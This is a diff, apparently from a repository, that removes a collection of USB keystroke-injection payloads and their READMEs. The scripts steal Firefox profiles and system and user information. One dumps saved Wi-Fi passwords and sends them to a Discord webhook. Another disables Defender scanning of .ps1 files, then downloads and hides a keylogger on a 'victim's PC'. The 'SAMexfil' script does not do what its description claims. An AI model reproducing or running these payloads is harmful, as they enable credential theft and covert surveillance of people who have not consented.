Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Exfiltrate Firefox profile and store to path. Change destination Path at the very end of the string.
    3  -REM Version: 1.0
    4  -REM Category: Exfiltration
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 1500
    8  -WINDOWS r
    9  -DELAY 1500
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 750
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 1200
    16  -ALT y
    17  -DELAY 1200
    18  -GUI UP
    19  -DELAY 1200
    20  -STRING $ErrorActionPreference = "SilentlyContinue";$folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-26528702.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$fireSaveDir = New-Item $userDir'\WGD\FireFox-Profile' -ItemType Directory;$fireDir = (Get-ChildItem env:userprofile).value + '\AppData\Roaming\Mozilla\Firefox\Profiles';Copy-Item $fireDir -Destination $fireSaveDir -Recurse;Start-Sleep -s 10;$Report >> $fileSaveDir'/ComputerInfo-26528702.html';Compress-Archive -Path $fileSaveDir -DestinationPath PATH\results-26528702.zip ; exit
    21  -ENTER
    22  - 
  • ■ ■ ■ ■ ■ ■
    1  -
    2  -# ExfilFirefox
    3  -This script exfiltrates the firefox profile and saves them to a local html file.
    4  -
    5  -## How to use?
    6  -
    7  -This script is not plug and play. You need to do the following changes:
    8  -
    9  -- change path of the file "-DestinationPath PATH\results-26528702.zip"
    10  -
    11  -
    12  -## Features
    13  -
    14  -- open powershell
    15  -- copy firefox profile
    16  -- paste profile into a html file
    17  -
    18  -
    19  -
    20  -## Feedback
    21  -
    22  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    23  -
    24  -
    25  -
    26  -
    27  -
    28  -
    29  -## Support
    30  -
    31  -For support, contact me via Discord "UNC0V3R3D#8662".
    32  -
    33  -
    34  -## Meta
    35  -
    36  -
    37  -- If you want to sponsor me on Patreon, the link is on my profile.
    38  -
    39  -
    40  - 
  • ■ ■ ■ ■ ■ ■
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Saves some general Information about the target pc to a file.
    3  -REM Version: 1.0
    4  -REM Category: Exfiltration
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 900
    8  -WINDOWS r
    9  -DELAY 900
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 750
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 900
    16  -ALT y
    17  -DELAY 900
    18  -STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss'); $userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime; $fileSaveDir = New-Item ($userDir) -ItemType Directory; $date = get-date; $style = '<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>'; $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-34231960.html'; $Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"; $SysBootTime = Get-WmiObject Win32_OperatingSystem; $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime; $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME); $SerialNo = $SysSerialNo.SerialNumber; $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model; $SysManufacturer = $SysInfo.Manufacturer; $SysModel = $SysInfo.Model; $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption; $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'"; $HD = [math]::truncate($disk.Size / 1GB); $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB); $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize; $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB); $SysCpu = Get-WmiObject Win32_Processor | Select Name; $Cpu = $SysCpu.Name; $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber; $HardSerialNo = $HardSerial.SerialNumber; $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name; $graphicsCard = gwmi win32_VideoController |select Name; $graphics = $graphicsCard.Name; $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1; $DriveLetter = $CDDrive.Drive; $DriveName = $CDDrive.Caption; $Disk = $DriveLetter + '\' + $DriveName; $Firewall = New-Object -com HNetCfg.FwMgr; $FireProfile = $Firewall.LocalPolicy.CurrentProfile; $FireProfile = $FireProfile.FirewallEnabled; $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>"; $Report >> $fileSaveDir'/ComputerInfo-34231960.html';Compress-Archive -Path $fileSaveDir -DestinationPath PATH TO SAVE FILE HERE\Gather_Informationresults-34231960.zip ; exit
    19  -ENTER
  • ■ ■ ■ ■ ■ ■
    1  -
    2  -# General_PC_Information
    3  -This script saves some general info about the pc into a file.
    4  -
    5  -## How to use?
    6  -
    7  -This script is not plug and play. You need to do the following changes:
    8  -
    9  -- change path of the file "-DestinationPath PATH TO SAVE FILE HERE\Gather_Informationresults-34231960.zip"
    10  -
    11  -
    12  -## Features
    13  -
    14  -- open powershell
    15  -- exfiltrate pc info
    16  -- paste info to a html file
    17  -
    18  -
    19  -
    20  -## Feedback
    21  -
    22  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    23  -
    24  -
    25  -
    26  -
    27  -
    28  -
    29  -## Support
    30  -
    31  -For support, contact me via Discord "UNC0V3R3D#8662".
    32  -
    33  -
    34  -## Meta
    35  -
    36  -
    37  -- If you want to sponsor me on Patreon, the link is on my profile.
    38  -
    39  -
    40  - 
  • ■ ■ ■ ■ ■ ■
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Simple Powershell script that stores alot of Info about the PC into a file. For more info read the comments (REM) in the code below.
    3  -REM Version: 1.0
    4  -REM Category: Exfiltration
    5  -DELAY 1000
    6  -GUI r
    7  -DELAY 450
    8  -REM Start Powershell as Admin
    9  -STRING powershell Start-Process powershell -Verb runAs
    10  -DELAY 500
    11  -ENTER
    12  -DELAY 600
    13  -LEFTARROW
    14  -DELAY 600
    15  -ENTER
    16  -DELAY 750
    17  -REM Change the "Path" to your path ("C:\...").
    18  -STRING $Path = "PATH"
    19  -DELAY 500
    20  -ENTER
    21  -DELAY 500
    22  -REM Creates the Results.txt file to the path
    23  -STRING New-Item -Path "$Path\Results.txt" -ItemType File
    24  -DELAY 500
    25  -ENTER
    26  -DELAY 700
    27  -REM Gets all the Info about the PC and stores them into the created Results.txt file
    28  -STRING Get-ComputerInfo | Out-File -FilePath "$Path\Results.txt"
    29  -DELAY 300
    30  -ENTER
  • ■ ■ ■ ■ ■ ■
    1  -
    2  -# GetAllComputerInfo
    3  -This script saves almost every valuable info about the pc to a file.
    4  -
    5  -## How to use?
    6  -
    7  -This script is not plug and play. You need to do the following changes:
    8  -
    9  -- change path of the file "STRING $Path = "PATH""
    10  -
    11  -
    12  -## Features
    13  -
    14  -- open powershell
    15  -- exfiltrate pc info
    16  -- paste info to a html file
    17  -
    18  -
    19  -
    20  -## Feedback
    21  -
    22  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    23  -
    24  -
    25  -
    26  -
    27  -
    28  -
    29  -## Support
    30  -
    31  -For support, contact me via Discord "UNC0V3R3D#8662".
    32  -
    33  -
    34  -## Meta
    35  -
    36  -
    37  -- If you want to sponsor me on Patreon, the link is on my profile.
    38  -
    39  -
    40  - 
  • ■ ■ ■ ■ ■ ■
    1  -REM Author: Startrk1995
    2  -REM Description: Saves the IP of the target pc to a discord webhook.
    3  -REM Version: 1.0
    4  -REM Category: Exfiltration
    5  -DELAY 500
    6  -GUI r
    7  -DELAY 200
    8  -STRING powershell
    9  -ENTER
    10  -DELAY 1000
    11  -STRING $url="DISCORD WEBHOOK LINK";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(|169.254.\d+.\d+)' >> stats.txt;(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;$Body=@{ content = "$env:computername Stats from Ducky/Pico"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F "[email protected]" $url ; Remove-Item '.\stats.txt';exit
    12  -ENTER
    13  - 
  • ■ ■ ■ ■ ■ ■
    1  -
    2  -# IP_To_Discord
    3  -Saves the IP of the target pc to a discord webhook.
    4  -
    5  -## How to use?
    6  -
    7  -This script is not plug and play. You need to do the following changes:
    8  -
    9  -- change the url of the discord webhook "$url="DISCORD WEBHOOK LINK""
    10  -
    11  -
    12  -## Features
    13  -
    14  -- open powershell
    15  -- get ip adress
    16  -- send file with ip to webhook
    17  -
    18  -
    19  -
    20  -## Feedback
    21  -
    22  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    23  -
    24  -
    25  -
    26  -
    27  -
    28  -
    29  -## Support
    30  -
    31  -For support, contact me via Discord "UNC0V3R3D#8662".
    32  -
    33  -
    34  -## Meta
    35  -
    36  -
    37  -- If you want to sponsor me on Patreon, the link is on my profile.
    38  -
    39  -
    40  - 
  • ■ ■ ■ ■ ■ ■
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: This script allows you to inject a software keylogger in victim's PC
    3  -REM Version: 1.0
    4  -REM Category: Exfiltration
    5  -DELAY 2500
    6  -GUI d
    7  -DELAY 500
    8  -GUI r
    9  -DELAY 500
    10  -STRING powershell.exe -windowstyle hidden
    11  -DELAY 200
    13  -DELAY 5000
    14  -LEFT
    15  -DELAY 150
    16  -ENTER
    17  -DELAY 5000
    18  -STRING cd C:\Users\Public\Documents
    19  -ENTER
    20  -STRING Add-MpPreference -ExclusionExtension ps1 -Force
    21  -ENTER
    22  -STRING Set-ExecutionPolicy unrestricted -Force
    23  -ENTER
    24  -STRING wget (LINK TO KEYLOGGER) -OutFile script.ps1
    25  -ENTER
    26  -DELAY 3500
    27  -STRING powershell.exe -noexit -windowstyle hidden -file script.ps1
    28  -ENTER
    29  -CAPSLOCK
    30  -DELAY 150
    31  -CAPSLOCK
    32  -DELAY 150
    33  -CAPSLOCK
    34  -DELAY 150
    35  -CAPSLOCK
    36  -DELAY 2000
    37  -CAPSLOCK
    38  -DELAY 150
    39  -CAPSLOCK
    40  -DELAY 150
    41  -CAPSLOCK
    42  -DELAY 150
    43  -CAPSLOCK
    44  -REM End of payload
    45  - 
  • ■ ■ ■ ■ ■ ■
    1  -
    2  -# Keylogger
    3  -This script is only for experienced penetration testers.
    4  -
    5  -## How to use?
    6  -
    7  -This script is not plug and play. You need to do the following changes:
    8  -
    9  -- change url to a .ps keylogger script "STRING wget (LINK TO KEYLOGGER)"
    10  -
    11  -
    12  -## Features
    13  -
    14  -- open powershell
    15  -- download .ps script
    16  -- execute script
    17  -
    18  -
    19  -
    20  -## Feedback
    21  -
    22  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    23  -
    24  -
    25  -
    26  -
    27  -
    28  -
    29  -## Support
    30  -
    31  -For support, contact me via Discord "UNC0V3R3D#8662".
    32  -
    33  -
    34  -## Meta
    35  -
    36  -
    37  -- If you want to sponsor me on Patreon, the link is on my profile.
    38  -
    39  -
    40  - 
  • ■ ■ ■ ■ ■ ■
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Saves all installed windows updates to a list. Don't forget to change the path.
    3  -REM Version: 1.0
    4  -REM Category: Exfiltration
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 1500
    8  -WINDOWS r
    9  -DELAY 1500
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 750
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 1200
    16  -ALT y
    17  -DELAY 1200
    18  -GUI UP
    19  -DELAY 1200
    20  -STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-90412137.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$Report = $Report + '<div id=center><h3> Installed Updates</h3>';$Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html Description, HotFixId,Installedon,InstalledBy);$Report = $Report + '</div>';$Report >> $fileSaveDir'/ComputerInfo-90412137.html'
    21  -ENTER
    22  -STRING Compress-Archive -Path $fileSaveDir -DestinationPath results-90412137.zip ; exit
    23  -ENTER
    24  - 
  • ■ ■ ■ ■ ■ ■
    1  -
    2  -# ListWindowsUpdates
    3  -This script is going to save the names of installed windows updates.
    4  -
    5  -## How to use?
    6  -
    7  -This script is not plug and play. You need to do the following changes:
    8  -
    9  -- change path for the file "-DestinationPath results-90412137.zip"
    10  -
    11  -
    12  -## Features
    13  -
    14  -- open powershell
    15  -- list windows updates
    16  -- store them into a file
    17  -
    18  -
    19  -
    20  -## Feedback
    21  -
    22  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    23  -
    24  -
    25  -
    26  -
    27  -
    28  -
    29  -## Support
    30  -
    31  -For support, contact me via Discord "UNC0V3R3D#8662".
    32  -
    33  -
    34  -## Meta
    35  -
    36  -
    37  -- If you want to sponsor me on Patreon, the link is on my profile.
    38  -
    39  -
    40  - 
  • ■ ■ ■ ■ ■ ■
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Extracts Security Account Manager of the PC to a file.
    3  -REM Version: 1.0
    4  -REM Category: Exfiltration
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 1500
    8  -WINDOWS r
    9  -DELAY 1500
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 750
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 1200
    16  -ALT y
    17  -DELAY 1200
    18  -GUI UP
    19  -DELAY 1200
    20  -STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-61748762.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>';$Report = $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path);$Report = $Report + '</div>';$Report >> $fileSaveDir'/ComputerInfo-61748762.html'
    21  -ENTER
    22  -STRING Compress-Archive -Path $fileSaveDir -DestinationPath PATH\results-61748762.zip ; exit
    23  -ENTER
    24  - 
  • ■ ■ ■ ■ ■ ■
    1  -
    2  -# SAMexfil
    3  -This script extracts the Security Account Manager (SAM) of the PC and saves it to a file.
    4  -
    5  -## How to use?
    6  -
    7  -This script is not plug and play. You need to do the following changes:
    8  -
    9  -- change path for the file "-DestinationPath PATH\results-61748762.zip"
    10  -
    11  -
    12  -## Features
    13  -
    14  -- open powershell
    15  -- copy SAM profile
    16  -- store it to a file
    17  -
    18  -
    19  -
    20  -## Feedback
    21  -
    22  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    23  -
    24  -
    25  -
    26  -
    27  -
    28  -
    29  -## Support
    30  -
    31  -For support, contact me via Discord "UNC0V3R3D#8662".
    32  -
    33  -
    34  -## Meta
    35  -
    36  -
    37  -- If you want to sponsor me on Patreon, the link is on my profile.
    38  -
    39  -
    40  - 
  • ■ ■ ■ ■ ■ ■
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Saves some general Information about the USB and Harddrives that are/were connected to the target pc and stores them into a file.
    3  -REM Version: 1.0
    4  -REM Category: Exfiltration
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 900
    8  -WINDOWS r
    9  -DELAY 900
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 750
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 900
    16  -ALT y
    17  -DELAY 900
    18  -GUI UP
    19  -DELAY 900
    20  -STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = '<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>';$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-68597243.html';$Report = $Report + '<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>';$u = 0;$allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace);$Report = $Report + '<div id=right><h3>USB Devices</h3><table>'
    21  -ENTER
    22  -STRING do {
    23  -ENTER
    24  -STRING $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB)
    25  -ENTER
    26  -STRING $Report = $Report + '<tr><td>Drive Name: </td><td>' + $allUsb[$u].Name + $allUsb[$u].Label + '</td><td>Free Space: </td><td>' + $gbUSB + 'GB</td></tr>'
    27  -ENTER
    28  -STRING Write-Output $fullUSB
    29  -ENTER
    30  -STRING $u ++
    31  -ENTER
    32  -STRING } while ($u -lt $allUsb.Count)
    33  -ENTER
    34  -STRING $Report = $Report + '</table></div>'
    35  -ENTER
    36  -STRING $Report >> $fileSaveDir'/ComputerInfo-68597243.html'
    37  -ENTER
    38  -STRING Compress-Archive -Path $fileSaveDir -DestinationPath PATH TO SAVE FILE HERE\HEREresults-68597243.zip ; exit
    39  -ENTER
  • ■ ■ ■ ■ ■ ■
    1  -
    2  -# USB_And_Harddrive_Information
    3  -Saves some general Information about the USB and Harddrives that are/were connected to the target pc and stores them into a file.
    4  -
    5  -## How to use?
    6  -
    7  -This script is not plug and play. You need to do the following changes:
    8  -
    9  -- change the path of the file "-DestinationPath PATH TO SAVE FILE HERE\HEREresults-68597243.zip"
    10  -
    11  -
    12  -## Features
    13  -
    14  -- open powershell
    15  -- get hardware info
    16  -- save infos to a file
    17  -
    18  -
    19  -## Feedback
    20  -
    21  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    22  -
    23  -
    24  -
    25  -
    26  -
    27  -
    28  -## Support
    29  -
    30  -For support, contact me via Discord "UNC0V3R3D#8662".
    31  -
    32  -
    33  -## Meta
    34  -
    35  -
    36  -- If you want to sponsor me on Patreon, the link is on my profile.
    37  -
    38  -
    39  - 
  • ■ ■ ■ ■ ■ ■
    1  -REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
    2  -REM Description: Saves some general Info about the current Win-User.
    3  -REM Version: 1.0
    4  -REM Category: Exfiltration
    5  -DELAY 750
    6  -WINDOWS d
    7  -DELAY 900
    8  -WINDOWS r
    9  -DELAY 900
    10  -STRING powershell Start-Process powershell -Verb runAs
    11  -ENTER
    12  -DELAY 750
    13  -LEFTARROW
    14  -ENTER
    15  -DELAY 900
    16  -ALT y
    17  -DELAY 900
    18  -STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-57059022.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired;$UserType = $UserInfo.AccountType;$UserSid = $UserInfo.SID;$UserPass = $UserInfo.PasswordRequired;$IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator');$Report = $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>";$Report = $Report + "</div>";$Report >> $fileSaveDir'/ComputerInfo-57059022.html'
    19  -ENTER
    20  -STRING Compress-Archive -Path $fileSaveDir -DestinationPath C:\PATH TO SAVE HERE\FILEresults-57059022.zip ; exit
    21  -ENTER
  • ■ ■ ■ ■ ■ ■
    1  -
    2  -# Win_User_Info
    3  -Saves some general Info about the current Win-User and stores it to a file.
    4  -
    5  -## How to use?
    6  -
    7  -This script is not plug and play. You need to do the following changes:
    8  -
    9  -- change the path of the file "C:\PATH TO SAVE HERE\FILEresults-57059022.zip"
    10  -
    11  -
    12  -## Features
    13  -
    14  -- open powershell
    15  -- get win user info
    16  -- save info to a file
    17  -
    18  -
    19  -## Feedback
    20  -
    21  -If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
    22  -
    23  -
    24  -
    25  -
    26  -
    27  -
    28  -## Support
    29  -
    30  -For support, contact me via Discord "UNC0V3R3D#8662".
    31  -
    32  -
    33  -## Meta
    34  -
    35  -
    36  -- If you want to sponsor me on Patreon, the link is on my profile.
    37  -
    38  -
    39  - 
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